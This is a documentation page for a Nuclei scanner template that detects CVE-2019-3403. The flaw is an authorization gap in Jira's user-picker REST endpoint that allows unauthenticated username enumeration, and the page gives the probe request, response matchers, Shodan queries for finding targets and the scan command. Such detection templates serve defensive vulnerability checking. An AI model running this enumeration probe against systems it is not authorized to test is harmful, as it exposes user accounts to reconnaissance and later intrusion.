Skip to content
Nuclei Templates

Jira - Incorrect Authorization

ID: CVE-2019-3403

Severity: medium

Author: Ganofins

Tags: cve,cve2019,atlassian,jira,enumeration

Description

Section titled “Description”

Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 is susceptible to an incorrect authorization check in the /rest/api/2/user/picker rest resource, enabling an attacker to enumerate usernames and gain improper access.

YAML Source

Section titled “YAML Source”
id: CVE-2019-3403


info:
  name: Jira - Incorrect Authorization
  author: Ganofins
  severity: medium
  description: Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 is susceptible to an incorrect authorization check in the /rest/api/2/user/picker rest resource, enabling an attacker to enumerate usernames and gain improper access.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive data, potential data breaches, and unauthorized actions within the Jira system.
  remediation: |
    Apply the latest security patches and updates provided by Atlassian to fix the vulnerability and ensure proper authorization controls are in place.
  reference:
    - https://jira.atlassian.com/browse/JRASERVER-69242
    - https://nvd.nist.gov/vuln/detail/CVE-2019-3403
    - https://github.com/nomi-sec/PoC-in-GitHub
    - https://github.com/rezasarvani/JiraVulChecker
    - https://github.com/und3sc0n0c1d0/UserEnumJira
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-3403
    cwe-id: CWE-863
    epss-score: 0.00379
    epss-percentile: 0.72862
    cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: jira
    shodan-query:
      - http.component:"Atlassian Jira"
      - http.component:"atlassian jira"
      - http.component:"atlassian confluence"
      - cpe:"cpe:2.3:a:atlassian:jira"
  tags: cve,cve2019,atlassian,jira,enumeration


http:
  - method: GET
    path:
      - "{{BaseURL}}/rest/api/2/user/picker?query="


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "application/json")'
          - 'contains_any(body, "\"users\":","\"usuario\":")'
          - 'contains_all(body, "\"total\":", "\"header\":")'
          - 'status_code == 200 || status_code == 404'
        condition: and


      - type: word
        part: body
        words:
          - 'total":0'
        negative: true
# digest: 4b0a00483046022100dd679e418f1f94d6507ad4f9274a3bad7d315205ed1dcdfc44065f015111dcf5022100dea05614d912bda96ed97ef2aefc3d610580a7474b11ee8fe55a459cd8a5105c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-3403.yaml"

View on Github